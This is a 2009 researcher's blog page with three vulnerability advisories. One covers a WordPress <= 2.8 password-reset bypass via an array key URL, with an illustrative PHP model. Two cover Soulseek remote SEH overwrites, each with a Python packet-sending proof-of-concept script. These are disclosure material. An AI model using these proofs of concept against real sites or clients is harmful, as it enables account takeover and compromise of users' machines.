Monday, August 10, 2009

WordPress <= 2.8.* Remote admin reset password

=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.* Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability.
WordPress is both free and priceless at the same time.
More simply, WordPress is what you use when you want to work with your blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way WordPress handles a password reset looks like this:
you submit your e-mail address or username via the form at /wp-login.php?action=lostpassword,
and WordPress sends you a reset confirmation by e-mail like this one:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click the link, WordPress resets your admin password, and it sends you another e-mail with your new credentials.

Let's see how it works:


wp-login.php:
...[snip]...
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
...[snip]...
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
...[snip]...

line 370:

    break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

    break;
...[snip]...

The password reset function can be abused: by submitting an array as the $key parameter, the confirmation step is bypassed and the admin password is reset. preg_replace() returns an array when given an array, empty() is false for a non-empty array, and wpdb::prepare() unpacks an array argument into its argument list, so the key check passes and the lookup runs with an empty key.
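
The following is an added illustration, not WordPress code: it models the key check from the excerpt above beside a hardened variant that rejects array input up front, and shows what each builds for the ?key[]= request. The names prepare_stub(), lookup_vulnerable(), lookup_hardened() and the table wp_users are assumptions; prepare_stub() only mirrors the array-unpacking behaviour of wpdb::prepare() in 2.8.

```php
<?php
// Added illustration, not WordPress code. prepare_stub() stands in for
// wpdb::prepare() and mirrors one 2.8 behaviour: when its first variable
// argument is an array, that array becomes the argument list (as in vsprintf).
function prepare_stub($query, ...$args) {
    if (isset($args[0]) && is_array($args[0])) {
        $args = $args[0];                       // the array is unpacked
    }
    // approximate the escaping; wpdb uses its own escape routine
    $args  = array_map(function ($a) { return addslashes((string) $a); }, $args);
    $query = str_replace('%s', "'%s'", $query); // quote each %s like prepare() does
    return vsprintf($query, $args);
}

// The check as in the advisory's excerpt: preg_replace() on an array returns an
// array, and empty() is false for a non-empty array, so array('') gets through.
function lookup_vulnerable($key) {
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ( empty( $key ) )
        return 'invalid_key';
    return prepare_stub("SELECT * FROM wp_users WHERE user_activation_key = %s", $key);
}

// Hardened variant (illustration): reject anything that is not a scalar before
// it reaches the regex and the query.
function lookup_hardened($key) {
    if ( empty( $key ) || is_array( $key ) )
        return 'invalid_key';
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ( empty( $key ) )
        return 'invalid_key';
    return prepare_stub("SELECT * FROM wp_users WHERE user_activation_key = %s", $key);
}

// Constructed inputs: the key from the mail quoted in the advisory, and what PHP
// puts in $_GET['key'] for the request "?action=rp&key[]=".
$mail_key  = 'o7naCKN3OoeU2KJMMsag';
$array_key = array('');

echo lookup_vulnerable($mail_key), "\n";   // normal case: key is looked up as given
echo lookup_vulnerable($array_key), "\n";  // array case: key check passed, empty key used
echo lookup_hardened($array_key), "\n";    // array case: rejected before the lookup
```

For the array input the vulnerable lookup builds a query with user_activation_key = '', which matches every account that has no pending reset, so the first such row has its password reset; the hardened lookup returns invalid_key instead.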


IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficient to reproduce this proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to reset the admin account password of any WordPress / WordPress MU installation <= 2.8.3.

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch is available for the moment.
Just make sure the admin e-mail address exists: the new password is only sent there, so the attacker cannot learn the reset password.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for their great research on PHP, as well as for this under-estimated vulnerability discovered by Maksymilian Arciemowicz:
http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

Thursday, July 2, 2009

Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution

=============================================
- Release date: July 02, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make
new friends and expand your mind!"

III. DESCRIPTION
-------------------------
The Soulseek client allows direct peer file search, letting a user search for the files he wants directly on a
peer's computer.
Unfortunately this feature is vulnerable to a remote SEH overwrite.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept targets a user called 123yow123.

import struct
import sys, socket
from time import *

ip = "IP_ADDR"
port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip,port))
except:
    print "Can\'t connect to peer!\n"
    sys.exit(0)

junk = "\x41" * 3084
next_seh = struct.pack("< L", 0x42424242)
seh = struct.pack("< L", 0x43434343)
other_junk = "\x61" * 1424

buffer = "\x17\x00\x00\x00\x01\x09\x00\x00\x00\x31\x32\x33\x79\x6f\x77\x31"
buffer+= "\x32\x33\x01\x00\x00\x00\x50\x00\x00\x00\x00\x21\x0c\x00\x00\x08"
buffer+= "\x00\x00\x00\x6c\x7b\x1d\x0c\x15\x0c\x00\x00"+junk+next_seh+seh+other_junk

s.send(buffer)


After the query is sent, the SEH handler is overwritten.


V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek client prior to 157 NS 13e.

VI. SYSTEMS AFFECTED
-------------------------
Windows all versions

VII. SOLUTION
-------------------------
Upgrade to 157 NS 13e
(http://slsknet.org/download.html)

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-------------------------
July 02, 2009

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII. PERSONAL NOTES
------------------------
The Soulseek team patched this bug a month ago; a distributed message urging users to upgrade their Soulseek client
has been sent for a month now, and not many users still use vulnerable Soulseek versions.
@to the one who likes to rip bugs and make an exploit "universal" for fame: just make sure it's at least
universal before you say so.
For the others : http://www.youtube.com/watch?v=tVACUjHn6yU :)

@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html

Thursday, June 4, 2009

Soulseek Patched !

Soulseek maintainer Nir Arbel has released a new Soulseek version (157 NS 13e) which plugs the security hole in previous clients.
He also limited the search query length on the server, to avoid any kind of mass random attack.

Contacting the Soulseek team was hard, but I need to mention that it wasn't because they were underestimating this security bug; they were just not reachable, because of circumstances that can happen.

I want to thank Nir Arbel for the very professional way he handled this security bug once contact could be made.

The Soulseek server was patched within hours of his acknowledging the security advisory, and he released a patched Soulseek client yesterday, after the bug was triggered locally.

Another advisory regarding another way to exploit this security hole will be responsibly disclosed once every client on the Slsk network has been upgraded.

Monday, May 25, 2009

Soulseek * P2P Remote Distributed Search Code Execution

=============================================
- Release date: May 24th, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make
new friends and expand your mind!"

III. DESCRIPTION
-------------------------
The Soulseek client allows distributed file search to one person, to everyone, or within a
specific Soulseek IRC channel, letting a user find the files he wants in
a dedicated channel, among his contacts, or on the whole network.
Unfortunately this feature is vulnerable to a remote SEH overwrite, targeting a specific
user or even a whole Soulseek IRC channel.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept is made to prevent an S-K party: it is only built to
target the user "testt4321".

To try this proof of concept, you would have to open a Soulseek client and use
the username:
"testt4321"
with the password:
"12345678"
and then launch this code.
If you want to change the username or target a whole channel, you would have
to reverse the binary protocol.



#!/usr/bin/python
import struct
import sys, socket
from time import *

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch

buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"

s.send(buffer)
sleep(1)

junk = "\x41" * 3084
next_seh = struct.pack('<L', 0x42424242)
seh = struct.pack('<L', 0x43434343)
other_junk = "\x61" * 1423

buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer2)
sleep(1)
s.recv(1024)



After the query is sent, the memory looks like this:
0012FBE4 41414141
0012FBE8 42424242 Pointer to next SEH record
0012FBEC 43434343 SE handler
0012FBF0 61616161

And the program terminates with these register values:
EAX 00000000
ECX 43434343
EDX 7C9132BC ntdll.7C9132BC
EBX 00000000
ESP 0012EA78
EBP 0012EA98
ESI 00000000
EDI 00000000
EIP 43434343


V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek client connected to
the Soulseek network.

VI. SYSTEMS AFFECTED
-------------------------
Windows all versions

VII. SOLUTION
-------------------------
A fast solution would be to use Nicotine-Plus (http://nicotine-plus.sourceforge.net/),
a Python Soulseek client.
Another quick workaround (at server level) would be to limit the search query length.

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-------------------------
May 24, 2009: Initial release


XI. DISCLOSURE TIMELINE
-------------------------
July 29, 2008: Bug discovered.
September 03, 2008: Vendor contacted; no response.
October 14, 2008: Vendor contacted; still no response.
April 12, 2009: iDefense contacted.
April 13, 2009: iDefense answered.
April 23, 2009: Advisory sent to the iDefense contributor program.
May 13, 2009: iDefense contacted; bug rejected (no reason given).
May 15, 2009: iDefense recontacted; no answer.
May 16, 2009: Last try to contact the Soulseek maintainers.
May 24, 2009: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.